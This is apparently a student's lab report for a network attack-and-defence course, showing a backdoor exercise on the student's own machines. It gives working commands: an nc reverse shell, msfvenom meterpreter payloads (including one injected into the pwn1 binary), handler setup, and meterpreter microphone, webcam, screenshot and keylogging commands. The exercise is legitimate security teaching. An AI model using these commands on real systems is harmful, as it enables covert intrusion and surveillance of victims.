# 20232429 马成栋 2025-2026-1 《网络与系统攻防技术》实验二实验报告

1.实验内容

掌握后门原理及免杀技术
回答问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?
通过一些恶意链接,在用户点击进去之后就给系统自动安装后门

(2)例举你知道的后门如何启动起来(win及linux)的方式?
在注册表里面设置为开机自启动

(3)Meterpreter有哪些给你映像深刻的功能?
几行命令就可以把我的麦克风、摄像头、屏幕和硬盘里面的文件全部调出来使用,非常强大,也非常危险

(4)如何发现自己有系统有没有被安装后门?
定期用杀毒软件排查电脑是不是有一些恶意启动的.exe程序,加强防火墙防护,注意防火墙提示信息

2.实验过程

1.1关闭所有防火墙

  • 如图所示关闭所有防火墙

1

1

1.2主机监听虚拟机获得shell

  • 在自己的win11上得到当前ip地址为192.168.1.108

1

  • 主机启动ncat监听2429端口

1

  • 在另一个终端中查看端口2429的监听情况

1

发现监听成功

  • 在虚拟机中输入命令 nc 192.168.1.108 2429 -e /bin/sh

1

可以发现主机成功获得了虚拟机的shell,查看到了当前目录/root中有文件夹20232429

1.3启动定时任务

  • 修改cron表,用第二个/usr/bin/vim.basic进行修改

1

修改成功结果如图

1

1.4修改定时任务

  • 由于没有点明要生成的内容写在哪里,对定时任务进行修改,进一步完善定时任务

1

修改后,每隔两分钟就会在20232429文件夹的1.log文件中输出20232429's homework

  • 修改之后的效果如图

1

cat命令就可以看到1.log文件中输出了20232429's homework

2.1使用socat获取主机的Shell

  • 下载安装好socat之后,启动并且成功链接虚拟机

2

  • 在socat里面设置win11将执行的定时任务

2

  • 设置好之后定时20:15:59发送程序,可以看到日志里定时计划发送成功了、

2

2

3使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

3.1生成一个后门程序

如图所示,使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.79.131 LPORT=2429 -f exe > backdoor20232429.exe命令生成一个后门程序backdoor20232429.exe,为攻击者提供远程控制会话

3

注意此处LHOST后面的地址是虚拟机的ip地址,不是主机的ip地址

3.2将生成的后门程序传给主机

  • 使用命令生成的后门程序在/root/home/kali/Desktop/20232429mcd文件夹里,直接将其拖入E盘中

3

3.3在虚拟机SHELL中输入如图命令尝试启动监视器

在终端里输入msfconsole,进入Metasploit的控制台,依次输入如下命令:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.79.131

set LPORT 2429

exploit

  • 输入命令之后如图

3

  • 在主机powershell中输入 ./backdooe20232429启动后门程序
  • 现在环境都准备就绪,可以开始攻击和尝试提权

4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

4.1开始攻击

  • 在启动好后门程序之后,回到虚拟机的shell中,输入dir得到E盘里面的目录如图:

3

输入以下的命令,进行攻击,分别为

  • 1录音
    record_mic
  • 2获取当前主机屏幕的画面保存为截屏
    screenshot
  • 3使用摄像头拍摄图片
    webcam_snap
  • 4捕获键盘输入
    keyscan_start
  • 5停止捕获
    keyscan_stop
  • 6输出主机键盘上的缓存,记录在shell上
    keyscan_dump
    我的键盘输入、保存截屏、输入按键有一些问题超时,未能正确输出
    结果如图

4

4

4.2尝试提权

  • 通过命令getuid查看用户名,通过命令getsystem尝试提权,但是我的失败了

4

4

5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

5.1注入后门

  • 通过命令msfvenom -p linux/x86/meterpreter/reverse tcp LHOST=192.168.79.131 LPORT=2429 -x /home/kali/Desktop/20232429mcd/pwn1 -f elf > 20232429_pwn2025,

5

  • 通过命令sudo chmod a+x 20232429_pwn2025增加权限

5.2再次监听

  • 另起一个shell,输入msfconsole,准备监听
    输入
        use exploit/multi/handler

        set payload linux/x86/meterpreter/reverse_tcp 

        set LHOST 192.168.79.131 
  
        set LPORT 2429 

在原来的shell里面输入./20232429pwn_2025

5

  • 最后发现成功监听。

3.问题及解决方案

  • 问题1:nc传输的backdoor20232429无法使用
  • 问题1解决方案:可能是因为存储在root文件夹里面,导致传输过来是不完整的?最终是在桌面也就是root/home/kali/Desktop/20232429mcd里面重新生成,然后直接借助VMtools拖到E盘里解决
  • 问题2:kali虚拟机鼠标图标消失,但是功能还能用
  • 问题2解决方案:尝试过重新安装虚拟机,但是只要系统更新就会导致鼠标消失,最后原因是kali内核驱动较旧,最新更新不兼容,调低kali版本就可以解决
  • 问题3:在执行msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.79.131 LPORT=2429 -f exe > backdoor20232429.exe命令生成一个后门程序backdoor20232429.exe时,把kali虚拟机地址填成主机IP地址了,导致监视器一直无法正常启动
  • 问题3解决方法:填入正确ip地址后顺利进行。

4.学习感悟、思考等

  • 这次的实验让我对网络攻防有了新的认识,meterpreter竟然可以用监听的端口号和ip轻松获取一台主机上的信息,可见防火墙和杀毒对于我们的电脑安全是多么的重要,同时,解决棘手的鼠标消失问题也让我的解决问题能力得到了提升,在解决问题的过程中学到了很多的知识。我要继续努力学习专业知识,成为一名网络空间安全人才,为网络安全做贡献。
posted @ 2025-10-22 22:46  20232429马成栋  阅读(2)  评论(0)    收藏  举报